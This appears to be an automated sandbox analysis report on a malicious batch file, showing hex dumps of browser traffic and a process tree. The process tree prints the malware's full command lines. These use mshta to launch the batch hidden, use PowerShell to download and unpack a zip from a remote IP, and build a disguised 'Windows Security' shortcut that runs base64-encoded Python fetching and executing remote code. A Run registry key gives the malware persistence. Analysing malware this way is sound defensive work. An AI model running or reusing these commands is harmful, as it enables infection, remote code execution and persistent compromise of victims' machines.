                                                                                                                                                                                                            Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32
                                                                                                                                                                                                            Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31
                                                                                                                                                                                                            Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65
                                                                                                                                                                                                            Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700320,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 4c 64 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75
                                                                                                                                                                                                            Data Ascii: : Apache-2.0\n*/\nvar Ld;_.Jd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC1378INData Raw: 33 64 5f 2e 58 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 59 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 59 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68
                                                                                                                                                                                                            Data Ascii: 3d_.Xd();return new _.Yd(b?b.createScriptURL(a):a)};_.$d\u003dfunction(a){if(a instanceof _.Yd)return a.i;throw Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else th
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC418INData Raw: 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72
                                                                                                                                                                                                            Data Ascii: {var c\u003db||document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));retur
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC281INData Raw: 31 31 32 0d 0a 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 65 5b 64 5d 2c 63 29 3a 5f 2e 6a 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6a 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6f 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f 72 64 65 72
                                                                                                                                                                                                            Data Ascii: 112for\"?a.htmlFor\u003dc:oe.hasOwnProperty(d)?a.setAttribute(oe[d],c):_.je(d,\"aria-\")||_.je(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};oe\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBorder


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.450028142.250.184.2284433320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 694010790
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 13 Nov 2024 12:27:05 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                            2024-11-13 12:27:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:07:25:03
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:07:25:03
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:07:25:06
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                                                                            Imagebase:0x7ff7e0b80000
                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:07:25:06
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:mshta vbscript:createobject("wscript.shell").run("""C:\Users\user\Desktop\x.bat"" ::",0)(window.close)
                                                                                                                                                                                                            Imagebase:0x7ff75c710000
                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:07:25:06
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ::"
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:07:25:07
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:07:25:09
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                                                                            Imagebase:0x7ff7e0b80000
                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:07:25:09
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('http://42.96.10.8/envxfix.zip', [System.IO.Path]::GetTempPath() + 'xFSOj9El1Q.zip') "
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:07:25:09
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:07:25:25
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $dst = [System.IO.Path]::Combine([System.Environment]::GetFolderPath('LocalApplicationData'), 'xFSOj9El1Q'); Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst } ; [System.IO.Compression.ZipFile]::ExtractToDirectory([System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'xFSOj9El1Q.zip'), $dst) "
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:07:25:25
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:07:26:20
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:LOCALAPPDATA\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() "
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:07:26:20
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:07:26:21
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force "
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:07:26:21
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:07:26:22
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:cmd.exe /c start "" "C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHA6Ly80Mi45Ni4xMC44L1ZPSU5FX0JVJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"
                                                                                                                                                                                                            Imagebase:0x7ff638090000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:07:26:22
                                                                                                                                                                                                            Start date:13/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
